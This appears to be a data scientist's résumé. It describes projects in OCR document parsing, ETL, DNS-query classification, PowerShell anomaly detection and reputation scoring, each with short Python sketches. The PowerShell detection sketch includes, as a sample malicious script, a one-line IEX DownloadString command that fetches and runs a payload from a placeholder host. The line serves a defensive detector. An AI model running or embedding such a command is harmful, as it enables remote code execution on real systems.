Meticulous Data Scientist accomplished in compiling, transforming, and analyzing complex information through software. Expert in machine learning and large-dataset management. Demonstrated success in identifying relationships and building solutions to business problems. Around six years of AI/ML application development experience, with major highlights:
The project implements a document parsing service that extracts relevant information from different kinds of documents such as CVs and JDs. It combines vision-based approaches with natural language processing to make sense of each document.
Technology Used: Python, spaCy, NLTK, OpenCV, Tesseract, PaddleOCR, Machine Learning, Deep Learning, Natural Language Processing, Large Language Models, LangChain, AWS Services, GenAI
Role and Responsibilities:
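For illustration, a minimal sketch of the kind of vision-plus-NLP extraction flow described above; the file name, OCR settings, and extracted fields are assumptions, not the production pipeline:

    import spacy
    from paddleocr import PaddleOCR

    # OCR the scanned document into raw text (PaddleOCR is one of the listed engines).
    ocr = PaddleOCR(lang="en")
    lines = [line[1][0] for page in ocr.ocr("sample_cv.png") for line in page]
    raw_text = "\n".join(lines)

    # Run spaCy NER over the recovered text to pull out candidate fields.
    nlp = spacy.load("en_core_web_sm")
    doc = nlp(raw_text)
    extracted = {
        "names": [e.text for e in doc.ents if e.label_ == "PERSON"],
        "organizations": [e.text for e in doc.ents if e.label_ == "ORG"],
        "dates": [e.text for e in doc.ents if e.label_ == "DATE"],
    }
    print(extracted)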
The goal of this project is to perform ETL tasks, including data compression, data formatting, and data versioning, at different stages across cloud and on-premise data stores. It enforces the Right To Be Forgotten policy in accordance with governmental regulations.
Technology Used: Python, PySpark, AWS Services, PostgreSQL, Snowflake, UC4 Automic, Privacera
Role and Responsibilities:
● Performed ETL tasks using AWS Glue and AWS Batch jobs.
● Implemented data compression, data formatting, and data versioning at different stages in cloud and on-premise data stores (sketched below).
● Implemented the Right to be Forgotten policy.
● Automated the entire workflow using UC4 Automic jobs, workflows, and the scheduler.
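A minimal PySpark sketch of the compression, formatting, and versioning steps above; the paths, column names, and version scheme are illustrative assumptions:

    from datetime import datetime
    from pyspark.sql import SparkSession

    spark = SparkSession.builder.appName("etl-sketch").getOrCreate()

    # Read raw CSV data from a landing zone (path is illustrative).
    df = spark.read.option("header", True).csv("s3://landing-zone/raw/events/")

    # Formatting + compression: write columnar Parquet with Snappy compression.
    # Versioning: partition each run by a load timestamp so earlier runs are kept.
    version = datetime.utcnow().strftime("%Y%m%d%H%M%S")
    (
        df.withColumnRenamed("event_ts", "event_timestamp")
          .write.mode("append")
          .option("compression", "snappy")
          .parquet(f"s3://curated-zone/events/version={version}/")
    )

    # Right to be Forgotten: rewrite the data with the requested user IDs removed.
    ids_to_forget = ["user-123"]  # would normally come from a deletion-request table
    cleaned = df.filter(~df["user_id"].isin(ids_to_forget))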
The scope of this project is to analyze DNS queries and determine whether each query is malicious, using different machine learning classification models.
Technology Used: Python, ML, NLP, AWS Services
Role and Responsibilities:
● Performed data collection from Splunk logs.
● Extracted and analyzed features from the queries.
● Implemented classification models to classify queries as normal or malicious (sketched below).
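A brief sketch of the classification step, assuming simple lexical features such as query length and character entropy; the feature set, sample data, and model choice are illustrative:

    import math
    from collections import Counter

    import pandas as pd
    from sklearn.ensemble import RandomForestClassifier

    def entropy(s: str) -> float:
        """Shannon entropy of a DNS query string; DGA-style domains tend to score high."""
        counts = Counter(s)
        return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

    def featurize(queries: pd.Series) -> pd.DataFrame:
        return pd.DataFrame({
            "length": queries.str.len(),
            "num_digits": queries.str.count(r"\d"),
            "num_dots": queries.str.count(r"\."),
            "entropy": queries.apply(entropy),
        })

    # `query` / `label` stand in for the Splunk export (placeholder rows).
    data = pd.DataFrame({"query": ["mail.example.com", "x9qz7a1k.bad-tld.ru"],
                         "label": [0, 1]})
    clf = RandomForestClassifier(n_estimators=100).fit(featurize(data["query"]), data["label"])
    print(clf.predict(featurize(pd.Series(["suspicious-a8f3k2.example.net"]))))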
This project focuses on detecting anomalies in PowerShell scripts by leveraging clustering models.
Technology Used: Python, ML, Clustering, AWS Services
Role and Responsibilities:
● Leveraged clustering models to identify rare PowerShell scripts as potential threats.
● Employed TF-IDF for comprehensive feature extraction from scripts.
● Applied K-means clustering to group similar scripts and differentiate anomalies effectively (sketched below).
● Streamlined the monitoring process, reducing the number of analysts required for suspicious-script review from 50 to 1.
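A brief sketch of the TF-IDF plus K-means approach above; the sample scripts, n-gram settings, and anomaly threshold are illustrative assumptions:

    import numpy as np
    from sklearn.cluster import KMeans
    from sklearn.feature_extraction.text import TfidfVectorizer

    # `scripts` stands in for the collected PowerShell command lines (placeholder data).
    scripts = [
        "Get-ChildItem -Path C:\\Users | Sort-Object Length",
        "Get-Process | Where-Object {$_.CPU -gt 100}",
        "IEX (New-Object Net.WebClient).DownloadString('http://evil.example/payload')",
    ]

    # TF-IDF on character n-grams is robust to obfuscated tokens in scripts.
    vectorizer = TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5))
    X = vectorizer.fit_transform(scripts)

    # Group similar scripts; points far from their cluster centroid are flagged as rare.
    kmeans = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)
    distances = np.linalg.norm(X.toarray() - kmeans.cluster_centers_[kmeans.labels_], axis=1)
    threshold = distances.mean() + 2 * distances.std()
    anomalies = [s for s, d in zip(scripts, distances) if d > threshold]
    print(anomalies)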
This solution enables financial institutions to assess an organization's reputation through an integrated, multidimensional strategy that consolidates news, reviews, and financial factors for accurate score analysis and reporting, including direct competitor analysis between organizations within the same sector.
Technology Used: Python, NLP, Deep Learning, AWS S3, AWS SageMaker
Role and Responsibilities:
● Extracted data from Twitter and Reuters news headlines.
● Cleaned and preprocessed the extracted datasets.
● Implemented reputation score calculation for organizations (sketched below).
● Implemented graphs to show the performance of an organization against its competitors within the same sector.
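A minimal sketch of a headline-based reputation score; the off-the-shelf sentiment model, sample headlines, and 0-100 scale are illustrative stand-ins for the project's scoring logic:

    from statistics import mean
    from transformers import pipeline

    # Headlines would come from the Twitter/Reuters extraction step (placeholders here).
    headlines = {
        "AcmeBank": ["AcmeBank beats quarterly earnings estimates",
                     "Regulator fines AcmeBank over compliance lapse"],
        "RivalBank": ["RivalBank announces record customer growth"],
    }

    # Off-the-shelf sentiment model used as a stand-in for the project's NLP/DL scoring.
    sentiment = pipeline("sentiment-analysis")

    def reputation_score(texts):
        """Map average signed sentiment onto a 0-100 reputation score."""
        results = sentiment(texts)
        signed = [r["score"] if r["label"] == "POSITIVE" else -r["score"] for r in results]
        return round(50 + 50 * mean(signed), 1)

    # Side-by-side scores support competitor comparison within the same sector.
    print({org: reputation_score(texts) for org, texts in headlines.items()})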
Global Data Science Challenge - 2023
Python, Faster R-CNN, Cascade R-CNN, AWS (SageMaker, S3)